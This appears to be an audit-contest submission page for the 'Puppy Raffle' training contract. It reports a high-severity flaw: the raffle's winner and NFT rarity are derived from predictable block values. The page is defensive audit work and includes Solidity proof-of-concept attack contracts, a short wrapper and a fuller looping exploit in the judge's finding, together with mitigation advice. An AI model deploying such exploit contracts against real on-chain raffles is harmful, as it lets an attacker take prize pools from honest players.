Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Weak on-chain randomness in `selectWinner` lets an attacker control both the winner and the puppy rarity

zanycloud526

Root + Impact

Description

  • The raffle should pick an unpredictable winner and an unpredictable NFT rarity.

  • Both are derived from values known/controllable at call time (msg.sender, block.timestamp, block.difficulty), so a caller can pre-compute the outcome and a validator can manipulate it.

@> uint256 winnerIndex =
@> uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
...
@> uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

Risk

Likelihood:

  • Occurs every time selectWinner is callable: the caller chooses msg.sender and reads block.timestamp/block.difficulty, computing the result off-chain / in a wrapper contract before submitting, and only submits when it wins.

Impact:

  • An attacker reliably claims the 80% prize pool and mints the rare/legendary NFT, breaking fairness and draining value from honest players.

Proof of Concept

// Attacker wrapper: revert unless this call wins, then retry next block/sender.
function winOrRevert(PuppyRaffle r) external {
uint256 idx = uint256(keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))) % r.playersLength();
require(r.players(idx) == address(this), "not winning this block");
r.selectWinner(); // guaranteed to pick address(this)
}

Recommended Mitigation

- uint256 winnerIndex =
- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
+ // Use a verifiable randomness source, e.g. Chainlink VRF, and select the
+ // winner/rarity in the VRF callback. Never derive raffle randomness from
+ // block.timestamp / block.difficulty / msg.sender.
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 6 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!